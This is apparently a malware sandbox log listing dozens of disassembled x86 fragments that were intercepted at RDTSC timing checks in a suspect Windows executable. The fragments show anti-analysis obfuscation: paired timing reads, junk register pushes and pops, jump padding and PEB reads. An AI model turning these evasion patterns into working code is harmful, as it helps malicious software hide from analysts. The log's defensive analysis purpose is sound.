Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C006C second address: 71C00EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FCBA141FCB0h 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA141FCAEh 0x0000001d xor al, FFFFFFB8h 0x00000020 jmp 00007FCBA141FCABh 0x00000025 popfd 0x00000026 mov dx, ax 0x00000029 popad 0x0000002a sub esp, 18h 0x0000002d jmp 00007FCBA141FCB2h 0x00000032 xchg eax, ebx 0x00000033 jmp 00007FCBA141FCB0h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov di, 2AF4h 0x0000003e mov bx, 0260h 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00EF second address: 71C00F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00F5 second address: 71C00FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00FB second address: 71C00FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C00FF second address: 71C0103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0103 second address: 71C01EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b jmp 00007FCBA141C931h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 jmp 00007FCBA141C92Ch 0x00000017 pushfd 0x00000018 jmp 00007FCBA141C932h 0x0000001d adc si, A238h 0x00000022 jmp 00007FCBA141C92Bh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b jmp 00007FCBA141C92Fh 0x00000030 pushfd 0x00000031 jmp 00007FCBA141C938h 0x00000036 add esi, 164E5BC8h 0x0000003c jmp 00007FCBA141C92Bh 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, esi 0x00000044 jmp 00007FCBA141C936h 0x00000049 mov esi, dword ptr [770206ECh] 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007FCBA141C92Eh 0x00000056 jmp 00007FCBA141C935h 0x0000005b popfd 0x0000005c popad 0x0000005d test esi, esi 0x0000005f pushad 0x00000060 jmp 00007FCBA141C933h 0x00000065 push ecx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C01EC second address: 71C0218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jne 00007FCBA1420A83h 0x0000000c pushad 0x0000000d mov eax, 42FA383Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCBA141FCB8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0218 second address: 71C021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C021C second address: 71C0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA141FCADh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0233 second address: 71C024F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C931h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C024F second address: 71C0362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 624Ah 0x00000008 popad 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c jmp 00007FCBA141FCB7h 0x00000011 mov ax, E87Fh 0x00000015 popad 0x00000016 call dword ptr [76FF0B60h] 0x0000001c mov eax, 7571E5E0h 0x00000021 ret 0x00000022 jmp 00007FCBA141FCB2h 0x00000027 push 00000044h 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBA141FCADh 0x00000030 sbb al, FFFFFFD6h 0x00000033 jmp 00007FCBA141FCB1h 0x00000038 popfd 0x00000039 popad 0x0000003a pop edi 0x0000003b jmp 00007FCBA141FCAEh 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 movzx esi, bx 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007FCBA141FCB9h 0x0000004c jmp 00007FCBA141FCABh 0x00000051 popfd 0x00000052 pushfd 0x00000053 jmp 00007FCBA141FCB8h 0x00000058 add eax, 6A86BEB8h 0x0000005e jmp 00007FCBA141FCABh 0x00000063 popfd 0x00000064 popad 0x00000065 popad 0x00000066 push eax 0x00000067 jmp 00007FCBA141FCB9h 0x0000006c xchg eax, edi 0x0000006d jmp 00007FCBA141FCAEh 0x00000072 push dword ptr [eax] 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FCBA141FCB7h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0362 second address: 71C037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C934h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C037A second address: 71C037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C037E second address: 71C0392 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0392 second address: 71C0396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0396 second address: 71C039A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C039A second address: 71C03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C03A0 second address: 71C03A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C03A6 second address: 71C03D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCBA141FCB8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C03D8 second address: 71C03E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0456 second address: 71C045A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C045A second address: 71C045E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C045E second address: 71C0464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0464 second address: 71C04A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA141C930h 0x00000009 xor ah, 00000018h 0x0000000c jmp 00007FCBA141C92Bh 0x00000011 popfd 0x00000012 mov ax, 87CFh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub eax, eax 0x0000001b jmp 00007FCBA141C92Bh 0x00000020 mov dword ptr [esi], edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C04A3 second address: 71C04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C04A7 second address: 71C04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C04C2 second address: 71C0522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007FCBA141FCAEh 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 jmp 00007FCBA141FCB0h 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c jmp 00007FCBA141FCB0h 0x00000021 mov eax, dword ptr [ebx+4Ch] 0x00000024 pushad 0x00000025 push ecx 0x00000026 mov bl, 3Fh 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push edi 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0522 second address: 71C05B6 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 57EDF574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+10h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FCBA141C939h 0x00000014 sub eax, 510365E6h 0x0000001a jmp 00007FCBA141C931h 0x0000001f popfd 0x00000020 mov cx, A817h 0x00000024 popad 0x00000025 mov eax, dword ptr [ebx+50h] 0x00000028 jmp 00007FCBA141C92Ah 0x0000002d mov dword ptr [esi+14h], eax 0x00000030 jmp 00007FCBA141C930h 0x00000035 mov eax, dword ptr [ebx+54h] 0x00000038 jmp 00007FCBA141C930h 0x0000003d mov dword ptr [esi+18h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FCBA141C937h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C05B6 second address: 71C0625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+58h] 0x0000000c jmp 00007FCBA141FCAEh 0x00000011 mov dword ptr [esi+1Ch], eax 0x00000014 jmp 00007FCBA141FCB0h 0x00000019 mov eax, dword ptr [ebx+5Ch] 0x0000001c pushad 0x0000001d jmp 00007FCBA141FCAEh 0x00000022 mov cx, DAA1h 0x00000026 popad 0x00000027 mov dword ptr [esi+20h], eax 0x0000002a jmp 00007FCBA141FCACh 0x0000002f mov eax, dword ptr [ebx+60h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 push esi 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0625 second address: 71C06B3 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCBA141C938h 0x00000008 and si, E898h 0x0000000d jmp 00007FCBA141C92Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dx, ax 0x00000018 popad 0x00000019 mov dword ptr [esi+24h], eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FCBA141C930h 0x00000023 and eax, 081492F8h 0x00000029 jmp 00007FCBA141C92Bh 0x0000002e popfd 0x0000002f mov di, cx 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+64h] 0x00000036 jmp 00007FCBA141C932h 0x0000003b mov dword ptr [esi+28h], eax 0x0000003e jmp 00007FCBA141C930h 0x00000043 mov eax, dword ptr [ebx+68h] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C06B3 second address: 71C06D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C06D0 second address: 71C06E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA141C92Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C06E0 second address: 71C0709 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007FCBA141FCB8h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0709 second address: 71C070E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C070E second address: 71C0714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0714 second address: 71C0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA141C92Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0732 second address: 71C0741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C08B7 second address: 71C08BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C08BD second address: 71C08DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+20h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 jmp 00007FCBA141FCACh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C08DA second address: 71C090D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c jmp 00007FCBA141C936h 0x00000011 lea eax, dword ptr [ebx+00000080h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C090D second address: 71C0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA141FCB3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0925 second address: 71C092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C092B second address: 71C092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C092F second address: 71C0933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0933 second address: 71C0992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007FCBA141FCB7h 0x0000000f nop 0x00000010 jmp 00007FCBA141FCB6h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FCBA141FCACh 0x0000001f xor cx, 4278h 0x00000024 jmp 00007FCBA141FCABh 0x00000029 popfd 0x0000002a mov cx, 55AFh 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0992 second address: 71C09D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C935h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FCBA141C92Ch 0x00000011 xor cx, AC08h 0x00000016 jmp 00007FCBA141C92Bh 0x0000001b popfd 0x0000001c movzx ecx, bx 0x0000001f popad 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C09D8 second address: 71C09DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C09DC second address: 71C09F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C938h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0A9A second address: 71C0AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FCBA141FCAEh 0x00000010 js 00007FCC111FE8AEh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0AC7 second address: 71C0ACD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0ACD second address: 71C0B57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 01D2C3C1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebp-0Ch] 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 popad 0x00000015 mov dword ptr [esi+04h], eax 0x00000018 jmp 00007FCBA141FCB1h 0x0000001d lea eax, dword ptr [ebx+78h] 0x00000020 pushad 0x00000021 call 00007FCBA141FCACh 0x00000026 movzx ecx, bx 0x00000029 pop edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FCBA141FCAAh 0x00000031 and al, 00000068h 0x00000034 jmp 00007FCBA141FCABh 0x00000039 popfd 0x0000003a mov ecx, 7587FB5Fh 0x0000003f popad 0x00000040 popad 0x00000041 push 00000001h 0x00000043 jmp 00007FCBA141FCB2h 0x00000048 nop 0x00000049 jmp 00007FCBA141FCB0h 0x0000004e push eax 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 pop edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0B57 second address: 71C0BFE instructions: 0x00000000 rdtsc 0x00000002 call 00007FCBA141C936h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCBA141C937h 0x00000013 jmp 00007FCBA141C933h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FCBA141C938h 0x0000001f xor ah, 00000018h 0x00000022 jmp 00007FCBA141C92Bh 0x00000027 popfd 0x00000028 popad 0x00000029 lea eax, dword ptr [ebp-08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FCBA141C92Bh 0x00000035 add si, 92DEh 0x0000003a jmp 00007FCBA141C939h 0x0000003f popfd 0x00000040 pushad 0x00000041 popad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0C93 second address: 71C0CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 call 00007FCBA141FCB8h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov edi, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, 2D916B59h 0x00000019 mov ax, 6415h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0CC4 second address: 71C0CF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c call 00007FCBA141C934h 0x00000011 mov si, 4771h 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 mov dl, 6Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0CF3 second address: 71C0D3C instructions: 0x00000000 rdtsc 0x00000002 mov ax, A165h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 js 00007FCC111FE663h 0x0000000f jmp 00007FCBA141FCB0h 0x00000014 mov eax, dword ptr [ebp-04h] 0x00000017 pushad 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c popad 0x0000001d mov dword ptr [esi+08h], eax 0x00000020 jmp 00007FCBA141FCB5h 0x00000025 lea eax, dword ptr [ebx+70h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D3C second address: 71C0D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141C92Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D4F second address: 71C0D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D55 second address: 71C0D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D59 second address: 71C0D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0D5D second address: 71C0DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007FCBA141C937h 0x0000000f nop 0x00000010 jmp 00007FCBA141C936h 0x00000015 push eax 0x00000016 pushad 0x00000017 mov ch, bl 0x00000019 mov eax, 0B543499h 0x0000001e popad 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov si, dx 0x00000026 jmp 00007FCBA141C92Dh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0DB4 second address: 71C0DD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA141FCB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 mov ax, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0DD5 second address: 71C0E1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FCBA141C932h 0x00000013 add ax, B0E8h 0x00000018 jmp 00007FCBA141C92Bh 0x0000001d popfd 0x0000001e mov ah, 20h 0x00000020 popad 0x00000021 mov dword ptr [esp], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FCBA141C92Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0E7B second address: 71C0E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EwhnoHx0n5.exeRDTSC instruction interceptor: First address: 71C0E81 second address: 71C0E86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
